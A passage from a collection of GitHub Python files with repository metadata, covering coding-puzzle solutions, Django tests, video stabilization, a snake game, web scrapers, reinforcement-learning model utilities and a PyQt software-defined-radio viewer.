idx, val in enumerate(lst):\n left_max = max(val, left_max)\n left_max_arr[idx] = left_max\n\n right_max = 0\n for idx in range(len(lst)-1, -1, -1):\n right_max = max(lst[idx], right_max)\n right_max_arr[idx] = right_max\n\n for idx, val in enumerate(lst):\n tot += min(left_max_arr[idx], right_max_arr[idx]) - val\n\n return tot\n\n def better_solution(self, arr):\n \"\"\"\n slow&fast pointers\n \"\"\"\n if len(arr) < 2:\n return 0\n\n total = 0\n max_i = arr.index(max(arr))\n\n left_max = arr[0]\n for num in arr[1:max_i]:\n print(\"left\", left_max - num)\n print(\"tot\", total)\n total += left_max - num\n left_max = max(left_max, num)\n\n right_max = arr[-1]\n for num in arr[-2:max_i:-1]:\n print(\"right\", right_max - num)\n total += right_max - num\n right_max = max(right_max, num)\n\n return total\n","repo_name":"wenhaoz-fengcai/dailycoding","sub_path":"src/prob30.py","file_name":"prob30.py","file_ext":"py","file_size_in_byte":1330,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"22597215006","text":"from django.test.testcases import TransactionTestCase\nfrom django.utils import unittest\nfrom django.utils.unittest.suite import TestSuite\nfrom accounts.tests.api import register_api_call, auth_api_call\nfrom cards.models import Card\nfrom cards.tests.api import create_card_api_call, delete_card_api_call\nfrom libs.version.context import version_context_manager\nfrom vaults.tests.api import create_vault_api_call, delete_vault_api_call\nfrom workspaces.tests.api import create_workspace_api_call, \\\n delete_workspace_api_call\n\n\nclass CardSoftDeleteTest(TransactionTestCase):\n\n def setUp(self):\n version_context_manager.set_enabled(False)\n\n def create_card(self):\n # create user\n email = 'jan@rclick.cz'\n register_api_call(email=email, nickname='Misan').data\n user1token = auth_api_call(email=email).data.get('token')\n\n # create workspace\n workspace = create_workspace_api_call(\n user1token, name='workspace').data\n\n #create vault\n vault = create_vault_api_call(user1token,\n name=\"vault_in_workspace\",\n workspace=workspace.get('id')\n ).data\n\n #create card\n card = create_card_api_call(user1token,\n name=\"card_in_vault\",\n vault=vault.get('id')\n ).data\n\n return user1token, workspace, vault, card\n\n def test_010_softdelete(self):\n\n user1token, workspace, vault, card = list(self.create_card())\n\n delete_card_api_call(user1token, card.get('id'))\n\n cards = Card.objects.filter(id=card.get('id'))\n self.assertEquals(cards.count(), 0)\n\n cards = Card.objects.include_deleted().filter(id=card.get('id'))\n self.assertEquals(cards.count(), 1)\n\n def test_020_softdelete_vault(self):\n # create user\n user1token, workspace, vault, card = list(self.create_card())\n\n delete_vault_api_call(user1token, vault.get('id'))\n\n cards = Card.objects.filter(id=card.get('id'))\n self.assertEquals(cards.count(), 0)\n\n cards = Card.objects.include_deleted().filter(id=card.get('id'))\n self.assertEquals(cards.count(), 1)\n\n @unittest.skip(\"should be fixed asap\")\n def test_030_softdelete_workspace(self):\n\n user1token, workspace, vault, card = list(self.create_card())\n\n delete_workspace_api_call(user1token, vault.get('id'))\n\n cards = Card.objects.filter(id=card.get('id'))\n self.assertEquals(cards.count(), 0)\n\n cards = Card.objects.include_deleted().filter(id=card.get('id'))\n self.assertEquals(cards.count(), 1)\n\n\ndef card_softdelete_suite():\n suite = TestSuite()\n suite.addTest(unittest.TestLoader().loadTestsFromTestCase(\n CardSoftDeleteTest))\n return suite\n","repo_name":"witoon-acom/vaultier","sub_path":"vaultier/cards/tests/card_softdelete.py","file_name":"card_softdelete.py","file_ext":"py","file_size_in_byte":2912,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"27127764204","text":"import logging\nfrom time import time\n\nimport cv2\nimport numpy as np\nfrom pathlib import Path\n\nfrom mediautil.video.vid import Vid\nfrom mediautil.image.img import Img\n\n\nclass Stabilizer:\n def __init__(\n self,\n vid: Vid,\n downscaling_factor: float = 2.0,\n ):\n \"\"\"\n Video stabilizer.\n Takes a Vid object and calculates translation/rotation transform for each frame.\n\n After stabilization, the frames returned will be post processed with the following strategy\n 1. The transform is shifted to be centered around median camera \"orientation\"\n 2. The image will be cropped (up to 20%) to minimize the amount of black borders\n 3. The image will be resized back to original image size\n \"\"\"\n self.vid = vid\n self.path = vid.path\n vid.as_img_objects = True\n self.as_img_objects = True\n\n original_output = vid.output_size\n vid.output_size = (\n int(original_output[0] / downscaling_factor),\n int(original_output[1] // downscaling_factor),\n )\n self.transform = self._calculate_transform()\n self.transform[:, :2] = self.transform[:, :2] * downscaling_factor\n vid.output_size = original_output\n\n self.transform = self.transform - np.median(self.transform, axis=0)\n self.post_process = self._get_post_process_func()\n\n # self.xmin, self.xmax = self.transform[:, 0].min(), self.transform[:, 0].max()\n # self.ymin, self.ymax = self.transform[:, 1].min(), self.transform[:, 1].max()\n # self.rmin, self.rmax = self.transform[:, 2].min(), self.transform[:, 2].max()\n\n # self.warp_shape = (int(self.vid._w + (self.xmax - self.xmin)), int(self.vid._h + (self.ymax - self.ymin)))\n\n # x = self.transform[:, 0]\n # y = self.transform[:, 1]\n # r = np.degrees(self.transform[:, 2])\n # from matplotlib import pyplot as plt\n # plt.plot(x, label='x')\n # plt.plot(y, label='y')\n # plt.plot(r, label='rotation')\n # plt.hlines(self.median_transform[0], xmin=0, xmax=len(self.vid), label='median x')\n # plt.hlines(self.median_transform[1], xmin=0, xmax=len(self.vid), label='median y')\n # plt.hlines(self.median_transform[2], xmin=0, xmax=len(self.vid), label='median y')\n # plt.legend()\n # plt.show()\n\n self._frame_iterator = iter(self.vid)\n self._transform_iterator = iter(self.transform)\n\n def _get_post_process_func(self):\n def f(image):\n s = image.shape\n T = cv2.getRotationMatrix2D((s[1] / 2, s[0] / 2), 0, 1.1)\n return cv2.warpAffine(image, T, (s[1], s[0]))\n\n return f\n\n def _calculate_transform(self):\n transform = np.zeros((len(self.vid) - 1, 3))\n\n iterator = iter(self.vid)\n previous = next(iterator)\n\n t = time()\n for i in range(transform.shape[0] - 1):\n # Detect feature points in previous frame\n prev_pts = cv2.goodFeaturesToTrack(\n previous.gray[..., 0],\n maxCorners=200,\n qualityLevel=0.01,\n minDistance=30,\n blockSize=3,\n )\n current = next(iterator)\n\n # Calculate optical flow (i.e. track feature points)\n curr_pts, status, err = cv2.calcOpticalFlowPyrLK(\n previous.gray[..., 0], current.gray[..., 0], prev_pts, None\n )\n\n # Sanity check\n assert prev_pts.shape == curr_pts.shape\n\n # Filter only valid points\n idx = np.where(status == 1)[0]\n prev_pts = prev_pts[idx]\n curr_pts = curr_pts[idx]\n\n # Find transformation matrix\n m = cv2.estimateAffinePartial2D(prev_pts, curr_pts)[0]\n\n # Extract traslation\n dx = m[0, 2]\n dy = m[1, 2]\n\n # Extract rotation angle\n dr = np.arctan2(m[1, 0], m[0, 0])\n\n transform[i] = [dx, dy, dr]\n previous = current\n\n trajectory = np.cumsum(-transform, axis=0)\n smoothed_trajectory = np.array(trajectory)\n # Moving average of transform as smoothing strategy\n r = 2 # Smoothing radius\n window_size = 2 * r + 1\n for i in range(3):\n f = np.ones(window_size) / window_size\n padded = np.lib.pad(trajectory[:, i], (r, r), \"edge\")\n smooth_padded = np.convolve(padded, f, mode=\"same\")\n smoothed_trajectory[:, i] = smooth_padded[r:-r]\n\n # from matplotlib import pyplot as plt\n # plt.plot(smoothed_trajectory[:, 0], label='x')\n # plt.plot(smoothed_trajectory[:, 1], label='y')\n\n # plt.plot(trajectory[:, 0], linestyle='dashed', label='original x')\n # plt.plot(trajectory[:, 1], linestyle='dashed', label='original y')\n # plt.show()\n\n logging.debug(f\"calculated transform\\t{time()-t}s\")\n return smoothed_trajectory\n\n def __iter__(self) -> \"Stabilizer\":\n self._frame_iterator = iter(self.vid)\n self._transform_iterator = iter(self.transform)\n return self\n\n def __next__(self):\n image = next(self._frame_iterator).get()\n dx, dy, dr = next(self._transform_iterator)\n\n m = np.array([[np.cos(dr), -np.sin(dr), dx], [np.sin(dr), np.cos(dr), dy]])\n\n image_stab = cv2.warpAffine(image, m, self.vid.wh)\n\n output = self.post_process(image_stab)\n if self.as_img_objects:\n return Img(output, numpy_color_mode=self.vid.color_mode)\n return output\n\n def __len__(self):\n return len(self.vid)\n\n def __str__(self):\n return f\"Stabilized {self.vid}\"\n\n def show(self, fs=False, fps=None):\n \"\"\"\n Show video using cv2.\n Function uses preset colormode and image size.\n\n use 'q' to stop video\n\n :param fs: Show in fullscreen\n :param fps: overwrite video FPS for visualization. 0 if step through frame by frame\n \"\"\"\n fps = self.vid.fps if fps is None else fps\n wait_time = int(1000 / fps) if fps != 0 else 0\n name = \"\"\n if fs:\n cv2.namedWindow(name, cv2.WND_PROP_FULLSCREEN)\n cv2.setWindowProperty(name, cv2.WND_PROP_FULLSCREEN, cv2.WINDOW_FULLSCREEN)\n\n for image in self:\n cv2.imshow(name, image)\n if ord(\"q\") == cv2.waitKey(wait_time):\n break\n cv2.destroyAllWindows()\n\n @property\n def fps(self):\n return self.vid._fps\n\n @property\n def wh(self):\n return self.vid.wh\n\n @property\n def color_mode(self):\n return self.vid.color_mode\n\n @property\n def hw(self):\n return self.vid.hw\n\n\nif __name__ == \"__main__\":\n # Stabilizer(Vid('3.webm'), downscaling_factor=4).show()\n\n for p in Path(\"/home/martin/repos/BIO/demo/video\").glob(\"*\"):\n v = Stabilizer(Vid(p), downscaling_factor=3).show()\n\n # from matplotlib import pyplot as plt\n\n # logging.getLogger().setLevel(logging.DEBUG)\n # dsfs = [1., 1.5, 2., 3., 4.]\n # timespv = []\n # for p in Path('/home/martin/repos/BIO/demo/video').glob('*'):\n # times = []\n # for dsf in dsfs:\n # times.append(time())\n # v = Stabilizer(Vid(p), downscaling_factor=dsf)\n # times[-1] = time() - times[-1]\n\n # timespv.append(times)\n\n # plt.boxplot(np.array(timespv), labels=[f'Factor: {d}' for d in dsfs])\n # plt.ylabel('time')\n # plt.show()\n","repo_name":"biometrical-as/mediautil","sub_path":"mediautil/video/stabilizer.py","file_name":"stabilizer.py","file_ext":"py","file_size_in_byte":7520,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"2952005131","text":"SEGMENT_DISTANCE = 20\nUP = 90\nRIGHT = 0\nDOWN = 270\nLEFT = 180\n\n\nclass Snake:\n def __init__(self):\n self.segments = []\n self.start()\n self.speed = 10\n self.head = self.segments[0]\n\n def start(self):\n x_cor = 0\n for segment in range(3):\n self.add_segment((x_cor, 0))\n x_cor -= 20\n\n def move(self):\n for segment in range(len(self.segments) - 1, 0, -1):\n x = self.segments[segment - 1].xcor()\n y = self.segments[segment - 1].ycor()\n self.segments[segment].goto(x, y)\n self.head.forward(self.speed)\n\n def up(self):\n if self.head.heading() != DOWN:\n self.head.setheading(UP)\n\n def right(self):\n if self.head.heading() != LEFT:\n self.head.setheading(RIGHT)\n\n def down(self):\n if self.head.heading() != UP:\n self.head.setheading(DOWN)\n\n def left(self):\n if self.head.heading() != RIGHT:\n self.head.setheading(LEFT)\n\n def controls(self):\n from turtle import Screen\n s = Screen()\n s.listen()\n s.onkey(self.up, \"Up\")\n s.onkey(self.right, \"Right\")\n s.onkey(self.down, \"Down\")\n s.onkey(self.left, \"Left\")\n\n def add_segment(self, position):\n from turtle import Turtle\n segment = Turtle(shape=\"square\")\n segment.color(\"white\")\n segment.penup()\n segment.goto(position)\n self.segments.append(segment)\n\n def extend(self):\n self.add_segment(self.segments[-1].position())\n","repo_name":"ngeksdev/snake-py","sub_path":"snake.py","file_name":"snake.py","file_ext":"py","file_size_in_byte":1563,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"42632625709","text":"#pip install lxml\n\nfrom bs4 import BeautifulSoup\nimport requests\n\nurl = 'https://olivesfordinner.com/category/appetizers/page/2'\nresponse = requests.get(url)\nhtmlText = response.text\n\n\n\nsoup = BeautifulSoup(htmlText, 'lxml')\nlinks = soup.find_all('article')\n\nlinkList = []\ntitleList = []\n\n#there are 12 recipe titles per appetizer page, \n#find the links and titles and put them each into a list\nfor link in links[0:12]:\n hyperL = link.find('header', class_ = 'entry-header').a['href']\n linkList.append(hyperL)\nfor title in links:\n x = title.get('aria-label')\n titleList.append(x)\n\n#pair the title with its corresponding link in a new list\nlist3 = [[x,y] for x,y in zip(titleList, linkList)]\n\nzzz = list3[8][1]\nprint(zzz)\n\n#to write list3 into the text file.\n'''for elem in list3:\n with open('test.txt', 'w') as f:\n f.write('\\n \\n'.join(map(str, list3)))'''\n ","repo_name":"youoldmiyoung/recipe-aggregator","sub_path":"recipes/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":895,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"13369239942","text":"\nfrom .models import Available_Day, Booking, Order \n\ndef removeSlot(booking, Time_From, totalSlotTime, totalSlotTime2):\n time_list = booking.time_list\n if totalSlotTime2 != 0:\n numberdec = (totalSlotTime2 / 0.5) - 1\n else: \n numberdec = 0\n remove_slot = Time_From + totalSlotTime + numberdec\n for v in range(Time_From, remove_slot + 1):\n time_list.remove(v)\n \n\n \n\n \n \n \n\n\n","repo_name":"ModeraLTD/afterglow_website","sub_path":"website/booking_slot.py","file_name":"booking_slot.py","file_ext":"py","file_size_in_byte":442,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"42258175017","text":"from selenium import webdriver\nfrom selenium.webdriver.common.by import By\n\nclass GoogleImageSearch:\n def __init__(self):\n self.driver = webdriver.Chrome() # Initialize Chrome WebDriver\n\n def fetch_links_by_search(self, search_query):\n # Navigate to Google Images\n self.driver.get('https://www.google.com/imghp?hl=EN')\n\n # Find the search bar and input the search query\n search_box = self.driver.find_element(By.XPATH, \"//textarea[@name='q']\")\n search_box.send_keys(search_query)\n search_box.submit()\n\n # Wait for search results to load (add any additional wait if required)\n self.driver.implicitly_wait(5)\n\n # Find all
elements with href containing \"/mon\"\n links = self.driver.find_elements(By.XPATH, \"//a[contains(@href, '/tec')]\")\n\n # Extract and print the links\n for link in links:\n href_value = link.get_attribute('href')\n print(href_value)\n\n # Close the WebDriver\n self.driver.quit()\n\n# Example usage: \nif __name__ == \"__main__\":\n search_query = \"tech\" \n google_image_search = GoogleImageSearch()\n google_image_search.fetch_links_by_search(search_query)\n","repo_name":"BASILAHAMED/fetch-Google-Links","sub_path":"fetch_google_links.py","file_name":"fetch_google_links.py","file_ext":"py","file_size_in_byte":1207,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"7688597660","text":"\"\"\"Training utility functions.\"\"\"\n\nimport torch\nimport torch.nn as nn\nfrom torch.distributions import Categorical\n\nfrom rllib.util.neural_networks.utilities import one_hot_encode\n\n\ndef get_target(model, observation):\n \"\"\"Get target from observation.\"\"\"\n if model.model_kind == \"dynamics\":\n target = observation.next_state\n elif model.model_kind == \"rewards\":\n target = observation.reward.unsqueeze(-1)\n elif model.model_kind == \"termination\":\n target = observation.done\n else:\n raise NotImplementedError\n return target\n\n\ndef gaussian_cdf(x, mean, chol_std):\n \"\"\"Get cdf of multi-variate gaussian.\"\"\"\n scale = torch.diagonal(chol_std, dim1=-1, dim2=-2)\n z = (x - mean) / (scale + 1e-6)\n return 0.5 * (1 + torch.erf(z / torch.sqrt(torch.tensor(2.0))))\n\n\ndef calibration_count(target, mean, chol_std, buckets):\n \"\"\"Get the calibration count of a target for the given buckets.\"\"\"\n p_hat = gaussian_cdf(target, mean, chol_std).reshape(-1)\n total = len(p_hat)\n\n count = []\n for p in buckets:\n count.append((p_hat <= p).sum().double() / total)\n count = torch.tensor(count)\n\n return count\n\n\ndef calibration_score(model, observation, bins=10):\n \"\"\"Get calibration score of a model.\n\n References\n ----------\n Gneiting, T., & Raftery, A. E. (2007).\n Strictly proper scoring rules, prediction, and estimation. JASA.\n\n Brier, G. W. (1950).\n Verification of forecasts expressed in terms of probability. Monthly weather review.\n\n Kuleshov, V., Fenner, N., & Ermon, S. (2018).\n Accurate uncertainties for deep learning using calibrated regression. ICML.\n Equation (9).\n \"\"\"\n state, action = observation.state, observation.action\n target = get_target(model, observation)\n prediction = model(state, action)\n if len(prediction) == 1:\n logits = prediction[0]\n probabilities = Categorical(logits=logits).probs\n labels = one_hot_encode(target, num_classes=logits.shape[-1])\n calibration_error = torch.mean((probabilities - labels) ** 2)\n else:\n mean, chol_std = prediction\n buckets = torch.linspace(0, 1, bins + 1)\n count = calibration_count(target, mean, chol_std, buckets)\n calibration_error = torch.sum((buckets - count) ** 2)\n return calibration_error\n\n\ndef sharpness(model, observation):\n \"\"\"Get prediction sharpness score.\n\n References\n ----------\n Kuleshov, V., Fenner, N., & Ermon, S. (2018).\n Accurate uncertainties for deep learning using calibrated regression. ICML.\n Equation (10).\n \"\"\"\n mean, chol_std = model(observation.state, observation.action)\n scale = torch.diagonal(chol_std, dim1=-1, dim2=-2)\n return scale.square().mean()\n\n\ndef model_mse(model, observation):\n \"\"\"Get model MSE.\"\"\"\n state, action = observation.state, observation.action\n target = get_target(model, observation)\n\n mean = model(state, action)[0]\n y = target\n\n return ((mean - y) ** 2).mean(-1).mean()\n\n\ndef model_loss(model, observation):\n \"\"\"Get model loss.\"\"\"\n state, action = observation.state, observation.action\n target = get_target(model, observation)\n\n prediction = model(state, action)\n if len(prediction) == 1: # Cross entropy loss.\n return nn.CrossEntropyLoss(reduction=\"none\")(prediction[0], target)\n\n mean, scale_tril = prediction[0], prediction[1]\n y = target\n if torch.all(scale_tril == 0): # Deterministic Model\n loss = ((mean - y) ** 2).mean(-1)\n else: # Probabilistic Model\n scale_tril_inv = torch.inverse(scale_tril)\n delta = scale_tril_inv @ ((mean - y).unsqueeze(-1))\n loss = (delta.transpose(-2, -1) @ delta).squeeze()\n\n # log det \\Sigma = 2 trace log (scale_tril)\n idx = torch.arange(mean.shape[-1])\n loss += 2 * torch.log(scale_tril[..., idx, idx]).mean(dim=-1).squeeze()\n return loss\n\n\nclass Evaluate(object):\n \"\"\"Context manager for evaluating an agent.\"\"\"\n\n def __init__(self, agent):\n self.agent = agent\n\n def __enter__(self):\n \"\"\"Set the agent into eval mode.\"\"\"\n self.agent.eval()\n\n def __exit__(self, *args):\n \"\"\"Set the agent into training mode.\"\"\"\n self.agent.train()\n","repo_name":"djtom98/RL_qreps","sub_path":"rllib/rllib/util/training/utilities.py","file_name":"utilities.py","file_ext":"py","file_size_in_byte":4241,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"23413963656","text":"from PyQt5 import QtGui\nfrom PyQt5.QtWidgets import QWidget, QLabel, QVBoxLayout, QHBoxLayout, QLineEdit, QPushButton, QCheckBox, QProgressBar\nfrom PyQt5.QtGui import QPixmap\nimport cv2\nfrom PyQt5.QtCore import pyqtSlot, Qt\nimport numpy as np\nfrom framegrabber_thread import VideoThread\nimport matplotlib.pyplot as plt\nfrom utils import get_img_array, get_model, norm_image_and_predict\nfrom settings import SdrSettings\nfrom matplotlib.mlab import psd\n\n\nclass App(QWidget):\n def __init__(self):\n super().__init__()\n\n self.setWindowTitle(\"~ Edgise Live SDR ~\")\n self.setMinimumWidth(900)\n\n self.sdr_settings = SdrSettings(load_from_file=True,\n filename=\"settings.json\",\n img_size=(1000, 1000),\n axes_off=False,\n predict=False)\n\n if self.sdr_settings.predict:\n self.model = get_model(\"models/model_it1.h5\")\n else:\n self.model = None\n\n # create the label that holds the image\n self.image_label = QLabel(self)\n self.image_label.resize(*self.sdr_settings.img_size)\n\n self.update_button = QPushButton('Update')\n\n fixed_width_labels = 80\n self.nfft_label = QLabel('NFFT')\n self.nfft_label.setFixedWidth(fixed_width_labels)\n self.gain_label = QLabel('gain')\n self.gain_label.setFixedWidth(fixed_width_labels)\n self.bandwidth_label = QLabel('bandwidth')\n self.bandwidth_label.setFixedWidth(fixed_width_labels)\n self.read_label = QLabel('read size')\n self.read_label.setFixedWidth(fixed_width_labels)\n self.samplefreq_label = QLabel('sample freq')\n self.samplefreq_label.setFixedWidth(fixed_width_labels)\n self.centerfreq_label = QLabel('center freq')\n self.centerfreq_label.setFixedWidth(fixed_width_labels)\n\n self.pred_bar = QProgressBar()\n self.pred_bar.setValue(50)\n\n self.axesoff_label = QLabel(\" \")\n self.axesoff_label.setFixedWidth(fixed_width_labels)\n self.axesoff_checkbox = QCheckBox(\"Axes off\")\n self.axesoff_checkbox.setChecked(self.sdr_settings.axes_off)\n\n self.nfft_input = QLineEdit(str(self.sdr_settings.nfft))\n self.gain_input = QLineEdit(str(self.sdr_settings.gain))\n self.bandwidth_input = QLineEdit(str(self.sdr_settings.bandwidth))\n self.read_input = QLineEdit(str(self.sdr_settings.DEFAULT_READ_SIZE))\n self.samplefreq_input = QLineEdit(str(self.sdr_settings.sample_rate))\n self.centerfreq_input = QLineEdit(str(self.sdr_settings.center_freq))\n\n nfft_layout = QHBoxLayout()\n nfft_layout.addWidget(self.nfft_label)\n nfft_layout.addWidget(self.nfft_input)\n\n gain_layout = QHBoxLayout()\n gain_layout.addWidget(self.gain_label)\n gain_layout.addWidget(self.gain_input)\n\n bandwidth_layout = QHBoxLayout()\n bandwidth_layout.addWidget(self.bandwidth_label)\n bandwidth_layout.addWidget(self.bandwidth_input)\n\n read_layout = QHBoxLayout()\n read_layout.addWidget(self.read_label)\n read_layout.addWidget(self.read_input)\n\n sample_layout = QHBoxLayout()\n sample_layout.addWidget(self.samplefreq_label)\n sample_layout.addWidget(self.samplefreq_input)\n\n center_layout = QHBoxLayout()\n center_layout.addWidget(self.centerfreq_label)\n center_layout.addWidget(self.centerfreq_input)\n\n axesoff_layout = QHBoxLayout()\n axesoff_layout.addWidget(self.axesoff_label)\n axesoff_layout.addWidget(self.axesoff_checkbox)\n\n vbox_right = QVBoxLayout()\n vbox_right.addLayout(nfft_layout)\n vbox_right.addLayout(gain_layout)\n vbox_right.addLayout(bandwidth_layout)\n vbox_right.addLayout(sample_layout)\n vbox_right.addLayout(center_layout)\n vbox_right.addLayout(read_layout)\n vbox_right.addLayout(axesoff_layout)\n vbox_right.addWidget(self.update_button)\n\n vbox_left = QVBoxLayout()\n vbox_left.addWidget(self.image_label)\n vbox_left.addWidget(self.pred_bar)\n\n # create a vertical box layout and add the two labels\n hbox = QHBoxLayout()\n hbox.addLayout(vbox_left)\n hbox.addLayout(vbox_right)\n\n # set the vbox layout as the widgets layout\n self.setLayout(hbox)\n\n # create the video capture thread\n self.thread = VideoThread(self.sdr_settings)\n # connect its signal to the update_image slot\n self.thread.change_pixmap_signal.connect(self.update_image)\n self.update_button.clicked.connect(self.update_settings)\n # start the thread\n self.thread.start()\n\n def closeEvent(self, event):\n self.thread.stop()\n event.accept()\n\n def update_settings(self):\n if self.gain_input.text() != \"auto\":\n self.sdr_settings.gain = int(self.gain_input.text())\n else:\n self.sdr_settings.gain = 'auto'\n\n self.sdr_settings.bandwidth = int(self.bandwidth_input.text())\n self.sdr_settings.sample_rate = int(self.samplefreq_input.text())\n self.sdr_settings.center_freq = int(self.centerfreq_input.text())\n self.sdr_settings.nfft = int(self.nfft_input.text())\n self.sdr_settings.DEFAULT_READ_SIZE = int(self.read_input.text())\n self.sdr_settings.axes_off = bool(self.axesoff_checkbox.isChecked())\n\n self.sdr_settings.save_to_file(create=True)\n\n self.thread.restart(self.sdr_settings)\n\n @pyqtSlot(np.ndarray)\n def update_image(self, samples):\n \"\"\"Updates the image_label with a new opencv image\"\"\"\n\n fig, ax = plt.subplots(nrows=1,\n ncols=1,\n figsize=(self.sdr_settings.img_size[0] // 100, self.sdr_settings.img_size[1] // 100),\n dpi=100) # two axes on figure\n new_psd, new_freq = psd(samples,\n NFFT=self.sdr_settings.nfft,\n Fs=self.sdr_settings.sample_rate)\n\n new_freq += self.sdr_settings.center_freq\n\n # print(new_freq.shape)\n\n new_psd = new_psd - np.min(new_psd)\n\n xlim = [self.sdr_settings.center_freq - self.sdr_settings.bandwidth // 2,\n self.sdr_settings.center_freq + self.sdr_settings.bandwidth // 2]\n\n lower_index = np.argmax(new_freq > xlim[0])\n upper_index = np.argmax(new_freq > xlim[1])\n\n new_freq = new_freq[lower_index:upper_index]\n new_psd = new_psd[lower_index:upper_index]\n\n new_psd = new_psd - np.min(new_psd)\n\n ax.set_ylim([0, 0.0004])\n if self.sdr_settings.axes_off:\n ax.axis(\"off\")\n ax.plot(new_psd, color=\"black\")\n img = get_img_array(fig, img_shape=self.sdr_settings.img_size).copy()\n\n if self.sdr_settings.predict:\n pred = norm_image_and_predict(img, self.model)\n val = pred * 100\n self.pred_bar.setValue(val)\n\n qt_img = self.convert_cv_qt(img)\n self.image_label.setPixmap(qt_img)\n plt.close(fig)\n\n def convert_cv_qt(self, cv_img):\n \"\"\"Convert from an opencv image to QPixmap\"\"\"\n rgb_image = cv2.cvtColor(cv_img, cv2.COLOR_BGR2RGB)\n h, w, ch = rgb_image.shape\n bytes_per_line = ch * w\n convert_to_Qt_format = QtGui.QImage(rgb_image.data, w, h, bytes_per_line, QtGui.QImage.Format_RGB888)\n p = convert_to_Qt_format.scaled(*self.sdr_settings.img_size, Qt.KeepAspectRatio)\n return QPixmap.fromImage(p)\n","repo_name":"samsterckval/SDR_VIEWR","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":7640,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"33340738941","text":"class Solution:\n def maxCoins(self, piles: List[int]) -> int:\n piles.sort()\n you = len(piles)-2\n bob = 0\n res = 0\n while bob nums[-1] * count:\n return\n if count == 2:\n left, right = 0, len(nums) - 1\n while left < right:\n s = nums[left] + nums[right]\n if s == target:\n final.append(result + [nums[left], nums[right]])\n left += 1\n while left < right and nums[left] == nums[left+1]:\n left += 1\n if s < target:\n left += 1\n else:\n right -= 1\n else:\n for i in range(len(nums) - count + 1):\n if i == 0 or (i > 0 and nums[i - 1] != nums[i]):\n findNsum(nums[i+1:], target - nums[i], count-1, result + [nums[i]], final)\n return\n\n r = []\n final = []\n findNsum(nums, target, 4, r, final)\n return final\n\n\n","repo_name":"hyt0617/leetcode","sub_path":"10-19/lc_18_fourSum.py","file_name":"lc_18_fourSum.py","file_ext":"py","file_size_in_byte":1084,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"15033655929","text":"AX,AY,BX,BY = map(int,input().split())\r\nN = int(input())\r\nsrc = [tuple(map(int,input().split())) for i in range(N)]\r\nsrc.append(src[0])\r\n\r\ndef cross_prod(ax,ay,bx,by,px,py):\r\n v1x = bx - ax\r\n v1y = by - ay\r\n v2x = px - ax\r\n v2y = py - ay\r\n return v1x * v2y - v1y * v2x\r\n\r\ndef is_crossing(x11,y11,x12,y12,x21,y21,x22,y22):\r\n l1_p21 = cross_prod(x11,y11,x12,y12,x21,y21)\r\n l1_p22 = cross_prod(x11,y11,x12,y12,x22,y22)\r\n l2_p11 = cross_prod(x21,y21,x22,y22,x11,y11)\r\n l2_p12 = cross_prod(x21,y21,x22,y22,x12,y12)\r\n return l1_p21 * l1_p22 < 0 and l2_p11 * l2_p12 < 0\r\n\r\nans = 0\r\nfor (x1,y1),(x2,y2) in zip(src, src[1:]):\r\n if is_crossing(AX,AY,BX,BY,x1,y1,x2,y2):\r\n ans += 1\r\nprint(ans//2 + 1)","repo_name":"Kawser-nerd/CLCDSA","sub_path":"Source Codes/AtCoder/abc016/D/3829901.py","file_name":"3829901.py","file_ext":"py","file_size_in_byte":709,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"72"} +{"seq_id":"1793674988","text":"\"\"\"trainermanagementsystem URL Configuration\r\n\r\nThe `urlpatterns` list routes URLs to views. For more information please see:\r\n https://docs.djangoproject.com/en/4.1/topics/http/urls/\r\nExamples:\r\nFunction views\r\n 1. Add an import: from my_app import views\r\n 2. Add a URL to urlpatterns: path('', views.home, name='home')\r\nClass-based views\r\n 1. Add an import: from other_app.views import Home\r\n 2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')\r\nIncluding another URLconf\r\n 1. Import the include() function: from django.urls import include, path\r\n 2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))\r\n\"\"\"\r\nfrom django.contrib import admin\r\nfrom django.urls import path, include\r\n\r\nfrom django.urls import path\r\n\r\nfrom trainerapp import views\r\n\r\nurlpatterns=[\r\n path('register',views.reg_fun,name='register'), #it will display register.html\r\n path('regdata',views.reg_data_fun), #it will store the data either in User table or in reg table\r\n path('log',views.log_fun,name='log'), #it will display login.html\r\n path('logread',views.log_read_fun), #it will\r\n path('Ahome', views.admin_home_fun, name='Ahome'), #display Admin homepage\r\n path('Thome', views.trainer_home_fun, name='Thome'), #it will display Trainer Homepage\r\n path('trainer_details',views.trainer_details, name='trainer_details'),# it will display all the trainer details\r\n path('delete/',views.delete_fun,name='delete'),#it will particular trainer details\r\n path('batch_Assign', views.batch_data_fun,name='batch_Assign'),\r\n path('readdata',views.batch_assign_fun),\r\n path('batchdetails',views.batch_details, name='batchdetails'),\r\n path('log_out',views.logout_fun,name='log_out')\r\n\r\n\r\n]\r\n\r\n","repo_name":"mallikarjunteli/Trainer-Management-System","sub_path":"trainermanagementsystem/trainerproject/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1752,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"10393338679","text":"# https://programmers.co.kr/learn/courses/30/lessons/12982\n\ndef solution(d, budget):\n d = sorted(d)\n i = 1\n while sum(d[:i]) <= budget and i <= len(d):\n i += 1\n \n answer = i - 1\n return 